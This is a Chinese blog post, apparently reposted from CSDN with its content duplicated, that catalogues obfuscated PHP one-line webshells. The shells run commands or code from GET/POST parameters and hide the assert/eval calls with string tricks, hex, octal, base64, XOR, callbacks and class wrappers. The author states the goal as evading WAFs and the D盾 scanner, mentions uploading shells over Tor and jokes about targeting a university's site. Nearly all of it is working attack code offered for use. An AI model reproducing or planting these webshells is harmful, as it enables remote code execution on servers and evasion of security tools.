5月202022
基于php一句话木马的变种总结
$_GET函数数据来源的web响应木马
@system($_GET['shell'])
@passthru($_GET['shell'])
同样也适用于以下变形
字符串(变量)变形
assert()相比较于eval()要灵活许多(只适用于php7.1以下版本)
substr_replace() //函数把字符串的一部分替换为另一个字符串
<?php
$a = substr_replace('assxxx','ert',3);
@$a($_POST['shell']);
?>
(PHP版本为7.2.10时挂马失败,php5.4.45时可以成功)
chr() //从指定 ASCII 值返回字符
<?php
$a = chr(0x61).chr(0x73).chr(0x73).chr(0x65).chr(0x72).chr(0x74);
@$a($_POST['shell']);
?>
strrev() //反转字符串。
<?php
$a = strrev('tressa');;
@$a($_POST['shell']);
?>
parse_str() //把查询字符串解析到变量中。
<?php
parse_str("name=assert");
$name($_POST['shell']);
?>
// \xhh hh十六进制编码的字符
<?php
$s = "\x61\x73\x73\x65\x72\x74";
@$s($_POST['shell']);
?>
// \ddd ddd八进制编码的字符,或者后向引用
<?php
$a = "\141\163\163\145\162\164";
$a($_POST['shell']);
?>
//通过中文乱码字符与strlen(),chr()函数相结合调用assert
<?php
$s = chr(strlen('R楝櫇賩矟m蛖?o礏!襔翻%豑翻%豑Ωv閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?o礏!捣?F襔翻%豑翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?o礏!捣?F襔翻%豑翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('楝櫇賩矟m蛖稤廕?赫?o!捣dl豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?赫?o礏!捣dl?F襔翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?赫?o礏!捣dl7o?F襔翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧'));$s($_POST['shell']);
?>
重新定义函数
<?php
function alexznb($a){
@assert($a);
}
alexznb($_POST['shell']);
?>
简要地说就是将原本一句马变形成一个函数,在此函数上定义木马语句,此原理反之亦然,在此就不多赘述
回调函数
回调函数的意思大概就是,在一个函数里,通过调用回调函数(系统函数库里的函数不能随便起名),把一个数组里的元素挨个传递给函数A,最后把函数A里面最后执行数组元素后的结果,一一呈现出来,这就是回调函数。
为了便于理解我编了如下基础的回调函数代码,试着看看或许能够更好地理解
大概就是这个意思,这里使用的是call_user_func_array()函数
我们在用该函数试试一句马:
<?php
@call_user_func_array(assert,array($_POST['shell']));
?>
很棒,上去了
(你们没有看到我的Tor browser)
回调函数变形:
为了便于理解源码,基本上每一行后面我都加了注释,为此我还很羞愧的恶补了20分钟的php面向对象编程的模块
<?php
class loveme { //类开始 php中通过class定义类
public $x;
public $y; //定义$x,$y两个类属性;PHP类属性内与变量非常相似,对象的属性可以存储单个值,值数组,甚至另一个对象。
function __construct($a,$b) { //定义方法 __construct
$this->x=$a; //使用this访问当前类的属性$x和$y,赋值给方法的$a,$b两个变量
$this->y=$b;
}
function test() { //定义方法 test
array_map($this->x,$this->y); //方法内调用回调函数
}
} //类结束
$p1=new loveme(assert,array($_POST['shell'])); //从lovem类中创建对象命名为 p1
$p1->test(); //对象$p1指向类loveme的test方法,相当于调用test
?>
特殊字符链接干扰
基本变化形式
<?php
@$s = $_POST['shell'];
$z = null;
eval($z.$s);
?>
添加换行符(\n)
<?php
@$s = $_POST['shell'];
$z = "\n";
eval($z.=$s);
?>
特别需要注意这里只能使用双引号,单引号不行 因为php里的单引号把内容当成纯文本,不会经过服务器翻译。而双引号则与此相反。里面的内容会经过服务器处理(process).
\r 回车 (十六进制 0D)
\t 水平制表符 (十六进制 09)
https://www.php.net/manual/zh/regexp.reference.escape.php
php官方文档对转义字符的解释(中文的四级没过也能看得懂!)
preg_replace()函数
<?php
@preg_replace("/abcde/e", $_POST['shell'], "abcdefg");
?>
这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令。这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行。
数组
一维数组
<?php
$a = substr_replace("assexx","rt",4);
@$b=[''=>$a($_POST['shell'])];
?>
这里在$a里面还字符串变形了一次
<?php
$a = chr(0x61).chr(0x73).chr(0x73).chr(0x65).chr(0x72).chr(0x74);
@$b=[''=>$a($_POST['shell'])];
?>
同样的变化,只是assert变为了十六进制字符组合后,放入一维数组 " " 中
多维数组
<?php
$b = substr_replace("assexx","rt",4);
$a = array($arrayName = array('a' => $b($_POST['shell'])));
?>
类
用类把函数包裹,D盾对类查杀较弱
<?php
class me{
public $a = ''; //定义类A的属性$a为一个数组
function __destruct(){ //定义__destruct方法
assert("$this->a");
}
}
$b = new me;
$b->a = $_POST['x'];
?>
魔术常量
据说D盾对类的查杀较弱,可以使用类的魔术常量构造一句马
<?php
class test { //类 test
function assert() //定义了一个实例,命名为assert
{
$f = __FUNCTION__ ;
@$f($_POST['shell']);
}
}
$t = new test();
$t->assert();
?>
就是定义一个叫做test的类,然后创建一个叫做assert的方法,属性里面用魔术常量将方法名赋值给变量,最后创建一个实例以调用这个系统,挂刀试试:
舒服了,很舒服
(但是php7.1以上用不了,但估计陕西**大学的教务网也用不起那么高版本的php)
编码绕过
通过base64编码构造一句马基础:
<?php
$a = base64_decode("YXNzZXJ0");
$a($_POST[x]);
?>
上一个综合较强的php一句马
(类,异或编码,字符拼接)(据说能绕D盾)
<?php
class ZXVG
{
public $c='';
public function __destruct()
{
$_0='&'^"\x47";
$_1='C'^"\x30";
$_2='A'^"\x32";
$_3='v'^"\x13";
$_4='J'^"\x38";
$_5='f'^"\x12";
$db=$_0.$_1.$_2.$_3.$_4.$_5;
return @$db($this->c);
}
}
$zxvg=new ZXVG();
@$zxvg->c=$_POST['shell'];
?>
以上总结都是基本形式,就像是乐高的基础部件,其中的每一段都能与任意无数的变种思路相结合,变化出无数种的形式,排列组合一定有一种能绕过所知的waf墙,那就看如何去灵活使用变化了
总结的话语总是那么的苍白无力,不如拿起电脑敲一敲试一试,在实践中的挂马总会是富有激情的探索之路。
无论在怎么样,这些一句话马也是只能应用于php7.1之下版本的服务器中,在往上的话,或许只能尝试大马或变态的eval()函数了;
————————————————
版权声明:本文为CSDN博主「Alexz__」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/Alexz__/article/details/102488644
@system($_GET['shell'])
@passthru($_GET['shell'])
同样也适用于以下变形
字符串(变量)变形
assert()相比较于eval()要灵活许多(只适用于php7.1以下版本)
substr_replace() //函数把字符串的一部分替换为另一个字符串
<?php
$a = substr_replace('assxxx','ert',3);
@$a($_POST['shell']);
?>
(PHP版本为7.2.10时挂马失败,php5.4.45时可以成功)
chr() //从指定 ASCII 值返回字符
<?php
$a = chr(0x61).chr(0x73).chr(0x73).chr(0x65).chr(0x72).chr(0x74);
@$a($_POST['shell']);
?>
strrev() //反转字符串。
<?php
$a = strrev('tressa');;
@$a($_POST['shell']);
?>
parse_str() //把查询字符串解析到变量中。
<?php
parse_str("name=assert");
$name($_POST['shell']);
?>
// \xhh hh十六进制编码的字符
<?php
$s = "\x61\x73\x73\x65\x72\x74";
@$s($_POST['shell']);
?>
// \ddd ddd八进制编码的字符,或者后向引用
<?php
$a = "\141\163\163\145\162\164";
$a($_POST['shell']);
?>
//通过中文乱码字符与strlen(),chr()函数相结合调用assert
<?php
$s = chr(strlen('R楝櫇賩矟m蛖?o礏!襔翻%豑翻%豑Ωv閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?o礏!捣?F襔翻%豑翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?o礏!捣?F襔翻%豑翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('楝櫇賩矟m蛖稤廕?赫?o!捣dl豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?赫?o礏!捣dl?F襔翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?赫?o礏!捣dl7o?F襔翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧'));$s($_POST['shell']);
?>
重新定义函数
<?php
function alexznb($a){
@assert($a);
}
alexznb($_POST['shell']);
?>
简要地说就是将原本一句马变形成一个函数,在此函数上定义木马语句,此原理反之亦然,在此就不多赘述
回调函数
回调函数的意思大概就是,在一个函数里,通过调用回调函数(系统函数库里的函数不能随便起名),把一个数组里的元素挨个传递给函数A,最后把函数A里面最后执行数组元素后的结果,一一呈现出来,这就是回调函数。
为了便于理解我编了如下基础的回调函数代码,试着看看或许能够更好地理解
大概就是这个意思,这里使用的是call_user_func_array()函数
我们在用该函数试试一句马:
<?php
@call_user_func_array(assert,array($_POST['shell']));
?>
很棒,上去了
(你们没有看到我的Tor browser)
回调函数变形:
为了便于理解源码,基本上每一行后面我都加了注释,为此我还很羞愧的恶补了20分钟的php面向对象编程的模块
<?php
class loveme { //类开始 php中通过class定义类
public $x;
public $y; //定义$x,$y两个类属性;PHP类属性内与变量非常相似,对象的属性可以存储单个值,值数组,甚至另一个对象。
function __construct($a,$b) { //定义方法 __construct
$this->x=$a; //使用this访问当前类的属性$x和$y,赋值给方法的$a,$b两个变量
$this->y=$b;
}
function test() { //定义方法 test
array_map($this->x,$this->y); //方法内调用回调函数
}
} //类结束
$p1=new loveme(assert,array($_POST['shell'])); //从lovem类中创建对象命名为 p1
$p1->test(); //对象$p1指向类loveme的test方法,相当于调用test
?>
特殊字符链接干扰
基本变化形式
<?php
@$s = $_POST['shell'];
$z = null;
eval($z.$s);
?>
添加换行符(\n)
<?php
@$s = $_POST['shell'];
$z = "\n";
eval($z.=$s);
?>
特别需要注意这里只能使用双引号,单引号不行 因为php里的单引号把内容当成纯文本,不会经过服务器翻译。而双引号则与此相反。里面的内容会经过服务器处理(process).
\r 回车 (十六进制 0D)
\t 水平制表符 (十六进制 09)
https://www.php.net/manual/zh/regexp.reference.escape.php
php官方文档对转义字符的解释(中文的四级没过也能看得懂!)
preg_replace()函数
<?php
@preg_replace("/abcde/e", $_POST['shell'], "abcdefg");
?>
这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令。这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行。
数组
一维数组
<?php
$a = substr_replace("assexx","rt",4);
@$b=[''=>$a($_POST['shell'])];
?>
这里在$a里面还字符串变形了一次
<?php
$a = chr(0x61).chr(0x73).chr(0x73).chr(0x65).chr(0x72).chr(0x74);
@$b=[''=>$a($_POST['shell'])];
?>
同样的变化,只是assert变为了十六进制字符组合后,放入一维数组 " " 中
多维数组
<?php
$b = substr_replace("assexx","rt",4);
$a = array($arrayName = array('a' => $b($_POST['shell'])));
?>
类
用类把函数包裹,D盾对类查杀较弱
<?php
class me{
public $a = ''; //定义类A的属性$a为一个数组
function __destruct(){ //定义__destruct方法
assert("$this->a");
}
}
$b = new me;
$b->a = $_POST['x'];
?>
魔术常量
据说D盾对类的查杀较弱,可以使用类的魔术常量构造一句马
<?php
class test { //类 test
function assert() //定义了一个实例,命名为assert
{
$f = __FUNCTION__ ;
@$f($_POST['shell']);
}
}
$t = new test();
$t->assert();
?>
就是定义一个叫做test的类,然后创建一个叫做assert的方法,属性里面用魔术常量将方法名赋值给变量,最后创建一个实例以调用这个系统,挂刀试试:
舒服了,很舒服
(但是php7.1以上用不了,但估计陕西**大学的教务网也用不起那么高版本的php)
编码绕过
通过base64编码构造一句马基础:
<?php
$a = base64_decode("YXNzZXJ0");
$a($_POST[x]);
?>
上一个综合较强的php一句马
(类,异或编码,字符拼接)(据说能绕D盾)
<?php
class ZXVG
{
public $c='';
public function __destruct()
{
$_0='&'^"\x47";
$_1='C'^"\x30";
$_2='A'^"\x32";
$_3='v'^"\x13";
$_4='J'^"\x38";
$_5='f'^"\x12";
$db=$_0.$_1.$_2.$_3.$_4.$_5;
return @$db($this->c);
}
}
$zxvg=new ZXVG();
@$zxvg->c=$_POST['shell'];
?>
以上总结都是基本形式,就像是乐高的基础部件,其中的每一段都能与任意无数的变种思路相结合,变化出无数种的形式,排列组合一定有一种能绕过所知的waf墙,那就看如何去灵活使用变化了
总结的话语总是那么的苍白无力,不如拿起电脑敲一敲试一试,在实践中的挂马总会是富有激情的探索之路。
无论在怎么样,这些一句话马也是只能应用于php7.1之下版本的服务器中,在往上的话,或许只能尝试大马或变态的eval()函数了;
————————————————
版权声明:本文为CSDN博主「Alexz__」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/Alexz__/article/details/102488644
-
日历
-
存档
- 2024年10月(1)
- 2023年2月(1)
- 2022年11月(1)
- 2022年10月(10)
- 2022年9月(13)
- 2022年8月(2)
- 2022年7月(14)
- 2022年6月(2)
- 2022年5月(8)
- 2022年4月(7)
- 2022年3月(13)
- 2022年2月(2)
- 2022年1月(9)
- 2021年12月(2)
- 2021年11月(4)
- 2021年10月(2)
- 2021年9月(6)
- 2021年7月(4)
- 2021年6月(3)
- 2021年5月(3)
- 2021年4月(11)
- 2021年3月(13)
- 2021年2月(2)
- 2021年1月(1)
- 2020年12月(1)
- 2020年4月(5)
- 2019年9月(1)
- 2019年8月(1)
- 2019年5月(3)
- 2018年3月(1)
- 2017年10月(1)
- 2016年7月(1)
- 2016年4月(1)
- 2015年12月(1)
- 2015年11月(3)
- 2015年9月(1)
- 2015年8月(10)
- 2015年7月(1)
- 2015年6月(1)
- 2015年4月(1)
- 2015年3月(3)
- 2015年2月(8)
- 2015年1月(4)
- 2014年12月(1)
- 2014年11月(27)
- 2014年10月(13)
- 2014年9月(14)
- 2014年8月(26)
- 2014年7月(21)
-
最新评论
- 令狐江:
喜欢这首歌是因为可以引起共鸣!
-
链接
-
搜索
发表评论
木有头像就木JJ啦!还木有头像吗?点这里申请属于你的个性Gravatar头像吧!